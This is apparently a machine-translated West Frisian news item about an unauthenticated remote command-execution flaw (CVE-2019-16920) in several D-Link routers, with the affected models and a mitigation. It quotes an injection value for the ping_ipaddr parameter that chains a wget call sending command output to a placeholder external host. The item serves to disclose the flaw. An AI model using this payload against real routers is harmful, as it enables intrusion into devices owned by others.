Op ôfstân eksploitbere kwetsberens yn D-Link-routers

Yn D-Link draadloze routers identifisearre gefaarlike kwetsberens (CVE-2019-16920), wêrtroch jo koade op ôfstân kinne útfiere oan 'e kant fan it apparaat troch in spesjaal fersyk te stjoeren nei de "ping_test" handler, tagonklik sûnder autentikaasje.

Nijsgjirrich, neffens de firmware-ûntwikkelders, moat de oprop "ping_test" allinich nei ferifikaasje útfierd wurde, mar yn 'e realiteit wurdt it yn alle gefallen neamd, nettsjinsteande it oanmelden yn' e webynterface. Benammen as jo tagong krije ta it application_sec.cgi-skript en de parameter "action=ping_test" trochjaan, ferwiist it skript nei de autentikaasjeside, mar fiert tagelyk de aksje dy't ferbûn is mei ping_test. Om de koade út te fieren, waard in oare kwetsberens brûkt yn ping_test sels, dy't it ping-hulpprogramma neamt sûnder de korrektheid fan it IP-adres goed te kontrolearjen dat foar testen is stjoerd. Om bygelyks it wget-hulpprogramma op te roppen en de resultaten fan it kommando "echo 1234" oer te bringen nei in eksterne host, spesifisearje gewoan de parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Op ôfstân eksploitbere kwetsberens yn D-Link-routers

De oanwêzigens fan 'e kwetsberens is offisjeel befêstige yn' e folgjende modellen:

  • DIR-655 mei firmware 3.02b05 of âlder;
  • DIR-866L mei firmware 1.03b04 of âlder;
  • DIR-1565 mei firmware 1.01 of âlder;
  • DIR-652 (gjin ynformaasje oer problematyske firmwareferzjes wurdt levere)

De stipeperioade foar dizze modellen is al ferrûn, dus D-Link sei. As befeiligingsoplossing kinne jo tagong ta de webynterface beheine allinich ta fertroude IP-adressen.

Letter waard ûntdutsen dat de kwetsberens ek wie beynfloedet modellen DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 en DIR-825, plannen foar it frijlitten fan updates wêrfoar noch net bekend binne.

Boarne: opennet.ru

Add a comment